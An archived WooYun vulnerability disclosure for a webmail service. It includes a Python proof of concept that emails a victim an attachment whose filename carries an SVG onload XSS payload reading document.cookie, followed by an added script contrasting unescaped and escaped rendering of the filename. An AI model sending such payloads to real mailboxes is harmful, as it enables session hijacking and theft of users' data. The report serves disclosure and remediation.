WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-06-22: Details reported to the vendor, awaiting vendor response
2014-06-26: Vendor confirmed; details disclosed to the vendor only
2014-06-29: Details opened to third-party security partners
2014-08-20: Details opened to core white hats and domain experts
2014-08-30: Details opened to regular white hats
2014-09-09: Details opened to intern white hats
2014-09-20: Details disclosed to the public
Another instance
The attachment filename is not filtered, so XSS can be triggered. Assume the attacker is [email protected] and the victim is [email protected].
import smtplib

# The archived page masks the real addresses. The report's SMTP host is
# smtp.attack.com, so the sender is the attacker's mailbox there and the
# receiver is the victim's mailbox on the affected webmail.
sender = '[email protected]'
receiver = '[email protected]'

# Raw MIME message. The attachment's name/filename parameters carry the
# payload; the base64 bodies are the ones from the report:
#   text part   -> " You are under attack."
#   html part   -> the same text in a <div>, followed by NetEase footer spans
#   attachment  -> "Code is poetry."
# RFC 2046 requires nested multiparts to use distinct boundaries. The original
# reused "YOUAREUNDERATTACK" for both levels, which makes a compliant parser
# close the outer message at the inner "--YOUAREUNDERATTACK--" and never
# reach the attachment, so the inner multipart/alternative gets its own
# boundary here.
message = """\
From: <test> <[email protected]>
To: <test> <[email protected]>
Subject: Test
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="YOUAREUNDERATTACK"

--YOUAREUNDERATTACK
Content-Type: multipart/alternative; boundary="YOUAREUNDERATTACK-ALT"

--YOUAREUNDERATTACK-ALT
Content-Type: text/plain; charset=GBK
Content-Transfer-Encoding: base64

IFlvdSBhcmUgdW5kZXIgYXR0YWNrLgoKCg==
--YOUAREUNDERATTACK-ALT
Content-Type: text/html; charset=GBK
Content-Transfer-Encoding: base64

PGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6MS43O2NvbG9yOiMwMDAwMDA7Zm9udC1zaXplOjE0cHg7Zm9udC1mYW1pbHk6YXJpYWwiPjxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OjEuNztjb2xvcjojMDAwMDAwO2ZvbnQtc2l6ZToxNHB4O2ZvbnQtZmFtaWx5OmFyaWFsIj4mbmJzcDtZb3UgYXJlIHVuZGVyIGF0dGFjay48L2Rpdj48YnI+PGJyPjxzcGFuIHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBpZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9zcGFuPjwvc3Bhbj48L2Rpdj48YnI+PGJyPjxzcGFuIHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBpZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9zcGFuPjwvc3Bhbj4=
--YOUAREUNDERATTACK-ALT--
--YOUAREUNDERATTACK
Content-Type: text/plain; name="filename.txt<svg onload=alert(document.cookie)>"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="filename.txt<svg onload=alert(document.cookie)>"

Q29kZSBpcyBwb2V0cnku
--YOUAREUNDERATTACK--
"""

try:
    # sendmail() normalises the LF line endings above to CRLF on the wire.
    with smtplib.SMTP('smtp.attack.com') as smtp:
        smtp.login('attack', 'password')
        smtp.sendmail(sender, receiver, message)
    print("Successfully sent email")
except (smtplib.SMTPException, OSError) as exc:
    print("Error: unable to send email:", exc)
Filter (escape the attachment filename before it is rendered).
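To show what the PoC relies on and what the suggested filter has to do, here is the attachment-name injection handled end to end: a MIME message is parsed with Python's standard email parser, the declared attachment filename is extracted, and it is rendered both the vulnerable way (interpolated into HTML as-is, the behaviour the report describes) and the hardened way (HTML-escaped for the text and attribute, URL-encoded for the link). This is an added example, not code from the WooYun report or from the affected webmail; the raw message, the addresses and the two render functions are constructed for illustration.

```python
import html
from email.parser import BytesParser
from urllib.parse import quote

# Constructed sample message (not a captured one): a minimal multipart/mixed
# whose attachment declares the same filename payload the report uses.
RAW_MESSAGE = b"""From: attacker <attacker@attack.example>
To: victim <victim@victim.example>
Subject: Test
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain; charset=utf-8

You are under attack.
--BOUNDARY
Content-Type: text/plain; name="filename.txt<svg onload=alert(document.cookie)>"
Content-Disposition: attachment; filename="filename.txt<svg onload=alert(document.cookie)>"

Code is poetry.
--BOUNDARY--
"""


def attachment_names(raw: bytes) -> list:
    """Return the declared filename of every attachment part, in order.

    get_filename() reads Content-Disposition's filename parameter and falls
    back to Content-Type's name parameter, so both injection points the PoC
    sets are covered.
    """
    msg = BytesParser().parsebytes(raw)
    names = []
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            names.append(part.get_filename() or "")
    return names


def render_unsafe(name: str) -> str:
    """Vulnerable rendering: the filename goes into the HTML untouched, so
    '<svg onload=...>' inside it becomes live markup (the report's bug)."""
    return f'<a class="attach" href="/download?name={name}">{name}</a>'


def render_safe(name: str) -> str:
    """Hardened rendering: HTML-escape the text node (quote=True also covers
    use inside attributes) and percent-encode the value placed in the URL."""
    safe_text = html.escape(name, quote=True)
    safe_url = quote(name, safe="")
    return f'<a class="attach" href="/download?name={safe_url}">{safe_text}</a>'


def looks_like_markup_injection(name: str) -> bool:
    """Cheap triage check for mail gateways or log review: does the declared
    filename contain characters that only matter to an HTML parser?"""
    return any(ch in name for ch in "<>\"'")


if __name__ == "__main__":
    for name in attachment_names(RAW_MESSAGE):
        print("declared filename:", name)
        print("suspicious:", looks_like_markup_injection(name))
        print("unsafe:", render_unsafe(name))
        print("safe:  ", render_safe(name))
```

The escaping in render_safe is context-specific: html.escape protects the text node and a quoted attribute, while urllib.parse.quote protects the query string; applying only one of the two leaves the other context injectable.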
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2014-06-26 22:01
None yet